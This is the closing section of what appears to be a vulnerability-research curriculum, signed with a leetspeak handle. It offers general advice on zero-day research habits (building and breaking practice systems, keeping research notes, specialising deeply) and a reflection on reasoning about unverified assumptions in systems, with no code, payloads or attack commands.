They build things. Writing your own vulnerable applications and then exploiting them develops intuition about where mistakes happen. Building a sanitizer and then breaking it teaches you what assumptions sanitizer writers make. Building a simple caching layer and then poisoning it teaches you what cache operators get wrong.

They maintain a research notes system. Every failed attack attempt, every interesting behavior, every "that's weird" moment gets written down with enough context to be revisited. Most zero-days are not found in a single session — they're assembled from observations made across multiple sessions, sometimes across multiple targets, where a pattern becomes clear only in retrospect.

They develop specialization. The researchers who find the most novel vulnerabilities are usually deep experts in one specific area — one browser engine, one framework, one protocol. Depth in a narrow area builds the kind of intimate understanding that surfaces assumptions invisible to generalists. Pick one area and go deeper than anyone else in your immediate peer group.

The Last Thing

Zero-day research is fundamentally an act of imagination constrained by technical reality. You have to be able to imagine that a system could behave differently from how its builders intended, and then you have to be disciplined enough to verify whether that imagination corresponds to reality.

The technical skills in this curriculum — understanding parser state machines, understanding trust boundaries, understanding protocol mechanics — are the constraints that make your imagination productive rather than random. Without them, you're guessing. With them, you're reasoning.

The researchers who find the most zero-days are not the ones who know the most payloads. They're the ones who can look at a new system they've never seen before and, within a short time, identify the three assumptions it's making that its builders didn't verify. That ability comes from practice, from building the mental models that let you see systems the way a parser sees them rather than the way a user sees them.

That's what this entire curriculum has been building toward.

********************************************************************************************************************************************************

~ 3L173 H4CK3R 1337 🙂✌️